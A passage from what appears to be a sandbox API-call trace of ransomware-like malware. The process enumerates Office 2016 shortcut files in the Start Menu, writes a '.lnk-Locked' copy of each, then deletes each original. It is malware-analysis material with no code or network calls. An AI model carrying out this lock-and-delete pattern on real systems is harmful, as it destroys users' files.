ftLastWriteTime.dwLowDateTime=0x9273cfa1, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office 2016 Upload Center.lnk", cAlternateFileName="OFFICE~2.LNK")) returned 1 [0300.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94023de6, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x94023de6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x94254f1a, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype for Business Recording Manager.lnk", cAlternateFileName="SKYPEF~1.LNK")) returned 1 [0300.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9463a58e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9463a58e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x94655329, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa43, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spreadsheet Compare 2016.lnk", cAlternateFileName="SPREAD~1.LNK")) returned 1 [0300.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fc6558, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x97fc6558, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98012c52, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="Telemetry Dashboard for Office 2016.lnk", cAlternateFileName="TELEME~1.LNK")) returned 1 [0300.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9833cf8e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x983a8bb3, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Telemetry Log for Office 2016.lnk", cAlternateFileName="TELEME~2.LNK")) returned 1 [0300.153] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.153] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.154] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools", lpFilePart=0x0) returned 0x50 [0300.154] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\", lpFilePart=0x0) returned 0x51 [0300.154] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.155] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d1e040, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x91d1e040, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91e8d725, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa37, dwReserved0=0x0, dwReserved1=0x0, cFileName="Database Compare 2016.lnk", cAlternateFileName="DATABA~1.LNK")) returned 1 [0300.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x923c7ef9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x923c7ef9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x925326a4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office 2016 Language Preferences.lnk", cAlternateFileName="OFFICE~1.LNK")) returned 1 [0300.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9261f39f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9261f39f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9273cfa1, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office 2016 Upload Center.lnk", cAlternateFileName="OFFICE~2.LNK")) returned 1 [0300.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94023de6, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x94023de6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x94254f1a, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype for Business Recording Manager.lnk", cAlternateFileName="SKYPEF~1.LNK")) returned 1 [0300.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9463a58e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9463a58e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x94655329, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa43, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spreadsheet Compare 2016.lnk", cAlternateFileName="SPREAD~1.LNK")) returned 1 [0300.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fc6558, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x97fc6558, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98012c52, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="Telemetry Dashboard for Office 2016.lnk", cAlternateFileName="TELEME~1.LNK")) returned 1 [0300.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9833cf8e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x983a8bb3, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Telemetry Log for Office 2016.lnk", cAlternateFileName="TELEME~2.LNK")) returned 1 [0300.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9833cf8e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x983a8bb3, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Telemetry Log for Office 2016.lnk", cAlternateFileName="TELEME~2.LNK")) returned 0 [0300.158] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.159] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Database Compare 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Database Compare 2016.lnk-Locked", lpFilePart=0x0) returned 0x71 [0300.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.159] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Database Compare 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\database compare 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.161] GetFileType (hFile=0x49c) returned 0x1 [0300.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.161] GetFileType (hFile=0x49c) returned 0x1 [0300.163] CloseHandle (hObject=0x49c) returned 1 [0300.163] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Database Compare 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Database Compare 2016.lnk", lpFilePart=0x0) returned 0x6a [0300.164] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Database Compare 2016.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\database compare 2016.lnk")) returned 1 [0300.165] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Language Preferences.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Language Preferences.lnk-Locked", lpFilePart=0x0) returned 0x7c [0300.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.165] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Language Preferences.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\office 2016 language preferences.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.166] GetFileType (hFile=0x49c) returned 0x1 [0300.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.166] GetFileType (hFile=0x49c) returned 0x1 [0300.168] CloseHandle (hObject=0x49c) returned 1 [0300.168] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Language Preferences.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Language Preferences.lnk", lpFilePart=0x0) returned 0x75 [0300.168] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\office 2016 language preferences.lnk")) returned 1 [0300.172] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Upload Center.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Upload Center.lnk-Locked", lpFilePart=0x0) returned 0x75 [0300.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.173] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Upload Center.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\office 2016 upload center.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.173] GetFileType (hFile=0x49c) returned 0x1 [0300.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.173] GetFileType (hFile=0x49c) returned 0x1 [0300.175] CloseHandle (hObject=0x49c) returned 1 [0300.175] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Upload Center.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Upload Center.lnk", lpFilePart=0x0) returned 0x6e [0300.175] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Office 2016 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\office 2016 upload center.lnk")) returned 1 [0300.191] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Skype for Business Recording Manager.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Skype for Business Recording Manager.lnk-Locked", lpFilePart=0x0) returned 0x80 [0300.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.191] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Skype for Business Recording Manager.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\skype for business recording manager.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.191] GetFileType (hFile=0x49c) returned 0x1 [0300.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.192] GetFileType (hFile=0x49c) returned 0x1 [0300.193] CloseHandle (hObject=0x49c) returned 1 [0300.194] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Skype for Business Recording Manager.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Skype for Business Recording Manager.lnk", lpFilePart=0x0) returned 0x79 [0300.194] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Skype for Business Recording Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\skype for business recording manager.lnk")) returned 1 [0300.199] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Spreadsheet Compare 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Spreadsheet Compare 2016.lnk-Locked", lpFilePart=0x0) returned 0x74 [0300.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.199] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Spreadsheet Compare 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\spreadsheet compare 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.199] GetFileType (hFile=0x49c) returned 0x1 [0300.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.199] GetFileType (hFile=0x49c) returned 0x1 [0300.201] CloseHandle (hObject=0x49c) returned 1 [0300.201] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Spreadsheet Compare 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Spreadsheet Compare 2016.lnk", lpFilePart=0x0) returned 0x6d [0300.201] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Spreadsheet Compare 2016.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\spreadsheet compare 2016.lnk")) returned 1 [0300.207] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Dashboard for Office 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Dashboard for Office 2016.lnk-Locked", lpFilePart=0x0) returned 0x7f [0300.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.207] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Dashboard for Office 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\telemetry dashboard for office 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.207] GetFileType (hFile=0x49c) returned 0x1 [0300.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.207] GetFileType (hFile=0x49c) returned 0x1 [0300.210] CloseHandle (hObject=0x49c) returned 1 [0300.210] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Dashboard for Office 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Dashboard for Office 2016.lnk", lpFilePart=0x0) returned 0x78 [0300.210] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Dashboard for Office 2016.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\telemetry dashboard for office 2016.lnk")) returned 1 [0300.212] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Log for Office 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Log for Office 2016.lnk-Locked", lpFilePart=0x0) returned 0x79 [0300.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.212] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Log for Office 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\telemetry log for office 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.213] GetFileType (hFile=0x49c) returned 0x1 [0300.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.213] GetFileType (hFile=0x49c) returned 0x1 [0300.214] CloseHandle (hObject=0x49c) returned 1 [0300.215] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Log for Office 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Log for Office 2016.lnk", lpFilePart=0x0) returned 0x72 [0300.215] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office 2016 Tools\\Telemetry Log for Office 2016.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office 2016 tools\\telemetry log for office 2016.lnk")) returned 1 [0300.217] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp", lpFilePart=0x0) returned 0x3c [0300.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.218] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp", lpFilePart=0x0) returned 0x3c [0300.218] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\", lpFilePart=0x0) returned 0x3d [0300.218] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.218] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.218] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97389110, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97389110, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0300.218] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.219] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.219] 